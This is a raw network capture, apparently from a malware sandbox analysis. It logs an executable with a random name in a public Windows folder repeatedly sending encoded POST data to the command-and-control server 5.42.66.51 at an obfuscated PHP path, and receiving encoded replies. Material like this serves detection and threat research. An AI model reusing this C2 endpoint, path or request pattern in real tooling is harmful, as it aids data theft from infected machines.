                                                                                                Oct 11, 2024 20:38:33.577200890 CEST2548OUTData Raw: 59 52 43 5d 5f 52 50 59 54 57 5b 54 52 5e 57 50 58 54 58 5a 5b 5b 55 59 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YRC]_RPYTW[TR^WPXTXZ[[UY_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-07*?64Y3Y.5&/; ]*82 819=5Z=7-;"_$,P,3
                                                                                                Oct 11, 2024 20:38:33.935823917 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:34.078910112 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:33 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                46192.168.2.5500315.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:34.251848936 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:34.607618093 CEST2552OUTData Raw: 59 58 46 5c 5a 5e 55 5e 54 57 5b 54 52 5d 57 51 58 5f 58 5d 5b 54 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YXF\Z^U^TW[TR]WQX_X][TUX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C0*0[*2P>5;'?*\6%.0$Y)8&7;--[%_=2$.+"_$,P,/
                                                                                                Oct 11, 2024 20:38:34.949815989 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:35.080893993 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:34 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                47192.168.2.5500325.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:34.769776106 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:35.123198986 CEST2140OUTData Raw: 59 5f 43 58 5a 58 55 5e 54 57 5b 54 52 5e 57 52 58 57 58 5a 5b 5b 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_CXZXU^TW[TR^WRXWXZ[[U\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A$ )8.U=7$<&]!C';0 [>81V7^=9-:) Z/+"_$,P,;
                                                                                                Oct 11, 2024 20:38:35.466171026 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:35.598938942 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 59 21 11 0a 05 28 20 31 1c 2f 3a 3e 0f 32 32 07 06 27 3b 23 5e 22 29 23 02 3a 00 24 0d 26 03 33 5c 3e 2c 3a 1e 30 2f 34 07 30 3b 2b 5d 0d 10 26 5d 27 30 32 5b 2a 01 3f 0e 3a 07 2d 06 24 2e 3e 5d 22 10 2f 16 35 10 3d 17 25 2c 3b 08 31 3d 22 0c 3c 34 25 10 2f 12 38 01 26 04 2f 55 0f 11 38 52 26 01 23 01 21 2e 38 0c 23 3c 3f 01 23 3f 04 12 20 55 2c 00 32 3a 3f 5b 26 02 2d 06 3e 33 06 0d 3d 0c 25 59 26 2a 29 51 28 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989Y!( 1/:>22';#^")#:$&3\>,:0/40;+]&]'02[*?:-$.>]"/5=%,;1="<4%/8&/U8R&#!.8#<?#? U,2:?[&->3=%Y&*)Q("S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                48192.168.2.5500335.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:35.219871998 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:35.576314926 CEST2552OUTData Raw: 59 5d 43 51 5a 59 50 5d 54 57 5b 54 52 58 57 53 58 53 58 54 5b 5d 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y]CQZYP]TW[TRXWSXSXT[]U\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-3/)]2Q*+3Y*5'834[>^.!(.=!Z)(]9"_$,P,;
                                                                                                Oct 11, 2024 20:38:35.898169994 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:36.027194977 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                49192.168.2.5500345.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:36.259574890 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:36.623825073 CEST2552OUTData Raw: 59 59 46 5a 5a 5a 50 59 54 57 5b 54 52 58 57 55 58 52 58 54 5b 5b 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YYFZZZPYTW[TRXWUXRXT[[U^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.B%)X>!=&43*5%(,>89Q79-5=!8].;"_$,P,;
                                                                                                Oct 11, 2024 20:38:36.963489056 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:37.095158100 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:36 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                50192.168.2.5500355.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:36.645514011 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:37.000258923 CEST2156OUTData Raw: 59 5e 43 59 5f 5f 55 5e 54 57 5b 54 52 5a 57 56 58 51 58 59 5b 5b 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y^CY__U^TW[TRZWVXQXY[[UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-3(>"U?5'3<6Y!;X80). ->9X>"7.+"_$,P,3
                                                                                                Oct 11, 2024 20:38:37.349616051 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:37.487339973 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:37 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5a 36 3c 28 04 2a 1d 3e 0e 2e 39 31 1c 31 32 39 00 25 2b 20 05 21 39 37 03 2c 2e 27 50 32 04 27 5d 2b 2c 2d 0d 27 01 23 5a 25 2b 2b 5d 0d 10 26 5e 27 23 21 07 2a 38 3b 0d 39 3e 2e 59 27 10 35 06 36 2e 2c 08 21 3e 3d 19 32 3f 33 0f 32 2d 25 54 28 1a 0c 01 2f 02 3b 5f 26 14 2f 55 0f 11 38 56 26 01 3c 1c 35 03 3b 55 34 3c 3c 16 20 3f 26 12 37 33 33 59 31 29 3b 11 32 2f 26 5b 2a 0d 06 0c 3e 1c 22 01 27 39 21 1f 3c 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989Z6<(*>.91129%+ !97,.'P2']+,-'#Z%++]&^'#!*8;9>.Y'56.,!>=2?32-%T(/;_&/U8V&<5;U4<< ?&733Y1);2/&[*>"'9!<"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                51192.168.2.5500365.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:37.430051088 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:37.779566050 CEST2552OUTData Raw: 59 5b 46 58 5f 52 55 55 54 57 5b 54 52 57 57 54 58 57 58 54 5b 58 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y[FX_RUUTW[TRWWTXWXT[XUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.39>;.?5(%?Y#%8;*;%P 5V9=6?!9;"_$,P,
                                                                                                Oct 11, 2024 20:38:38.114505053 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:38.243510008 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:38 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                52192.168.2.5500375.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:38.507783890 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:38.857650995 CEST2156OUTData Raw: 59 5c 43 5a 5a 5f 50 5e 54 57 5b 54 52 5c 57 54 58 51 58 59 5b 5c 55 5f 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\CZZ_P^TW[TR\WTXQXY[\U__[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C0)#>+1='65/Y834[*;>76.[=!,-"_$,P,+
                                                                                                Oct 11, 2024 20:38:39.290798903 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:39.319175005 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 59 35 3f 37 5e 2a 55 21 1e 2c 3a 2a 0e 32 31 21 01 25 06 05 17 22 29 38 59 2e 3d 3c 0d 24 2a 37 12 2a 2f 2a 10 30 2c 2b 5e 27 2b 2b 5d 0d 10 26 16 24 0d 3e 12 3d 01 30 57 2e 07 39 01 33 3e 2e 15 22 2e 24 0d 35 07 21 5a 26 05 3c 53 25 3e 39 51 3f 1a 2a 02 2c 5a 38 00 25 3e 2f 55 0f 11 38 1e 32 01 3b 07 23 3d 23 54 34 3f 38 16 23 3f 0c 59 37 0d 20 04 26 04 01 59 31 02 3e 10 2a 33 24 0c 3d 0c 08 05 25 03 25 54 3f 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989Y5?7^*U!,:*21!%")8Y.=<$*7*/*0,+^'++]&$>=0W.93>.".$5!Z&<S%>9Q?*,Z8%>/U82;#=#T4?8#?Y7 &Y1>*3$=%%T?"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                53192.168.2.5500385.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:38.815675020 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:39.170012951 CEST2552OUTData Raw: 59 5b 43 50 5a 5f 50 5e 54 57 5b 54 52 59 57 55 58 53 58 5d 5b 5f 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y[CPZ_P^TW[TRYWUXSX][_UW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A$Z=;=58Y',.6&<,<>.!;--[5Y*1+:+"_$,P,
                                                                                                Oct 11, 2024 20:38:39.504086018 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:39.633981943 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:39 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                54192.168.2.5500395.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:40.337326050 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:40.685940981 CEST2156OUTData Raw: 59 5b 46 58 5f 5c 55 5b 54 57 5b 54 52 57 57 53 58 56 58 58 5b 55 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y[FX_\U[TW[TRWWSXVXX[UUV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.@$9=8"W?68$5080')%W!(*9=9[=]9"_$,P,
                                                                                                Oct 11, 2024 20:38:41.019238949 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:41.147634983 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:40 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 03 22 3f 33 1b 2a 0a 21 50 2e 2a 3e 0f 31 32 2a 5f 25 38 2b 5a 36 03 20 59 2e 10 27 50 24 39 2b 59 2b 2c 22 55 30 3f 24 06 27 2b 2b 5d 0d 10 26 5f 24 20 3d 00 2a 2b 33 08 2c 2d 2e 5a 33 3e 39 02 35 3e 20 08 22 58 2a 04 31 2c 24 1a 31 13 39 54 3f 42 3d 5b 2d 3f 37 14 26 14 2f 55 0f 11 38 11 32 01 16 5a 23 3d 3b 53 20 2c 24 15 21 2f 32 10 20 0a 3c 01 32 3a 27 5a 32 3c 26 59 2a 23 0d 52 29 22 25 58 27 39 22 0d 3c 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:"?3*!P.*>12*_%8+Z6 Y.'P$9+Y+,"U0?$'++]&_$ =*+3,-.Z3>95> "X*1,$19T?B=[-?7&/U82Z#=;S ,$!/2 <2:'Z2<&Y*#R)"%X'9"<""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                55192.168.2.5500405.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:42.079010963 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:42.439129114 CEST2552OUTData Raw: 59 5c 43 5e 5a 58 50 59 54 57 5b 54 52 5c 57 51 58 5f 58 5f 5b 5a 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\C^ZXPYTW[TR\WQX_X_[ZU]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C$)<\?8!*'%/[!588'>8 ;2-=)?2 Z.+"_$,P,+
                                                                                                Oct 11, 2024 20:38:42.761137009 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:42.891403913 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                56192.168.2.5500415.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:42.162494898 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
